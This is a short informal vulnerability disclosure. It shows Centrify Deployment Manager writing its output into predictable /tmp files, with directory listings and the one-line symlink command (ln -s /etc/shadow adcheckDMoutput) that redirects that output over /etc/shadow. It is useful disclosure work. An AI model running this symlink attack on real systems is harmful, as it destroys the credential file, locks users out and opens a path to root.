While at a training session for centrify, I noticed poor handling of files in /tmp. I was able to overwrite /etc/shadow with the contents of adcheckDMoutput.
I am sure there are more vulnerabilities to be exploited, maybe a local root - but being this is a training class I should probably pay attention.
total 6680
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
-rw-rw-r-- 1 clyde clyde 188 Dec 3 14:41 centrify.cmd.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
[root@engnew-cen tmp]# ls -l
total 6680
-rw-rw-rw- 1 root root 3999 Dec 3 14:41 adcheckDMoutput -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
[root@engnew-cen tmp]# ls -l
total 6688
-rw-rw-rw- 1 root root 3999 Dec 3 14:41 adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 clyde clyde 132 Dec 3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
[root@engnew-cen tmp]# ls -l
total 6672
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
$ nobody> ln -s /etc/shadow adcheckDMoutput
# ls -l /etc/shadow
-r-------- 1 root root 3999 Dec 3 14:56 /etc/shadow
/etc/shadow has been overwritten with the contents of adcheckDMoutput, which is generated when software is pushed to a host via Deployment Manager.
The 210 appended to the end of files in /tmp is the users UID number.
Larry W. Cashdollar
@_larry0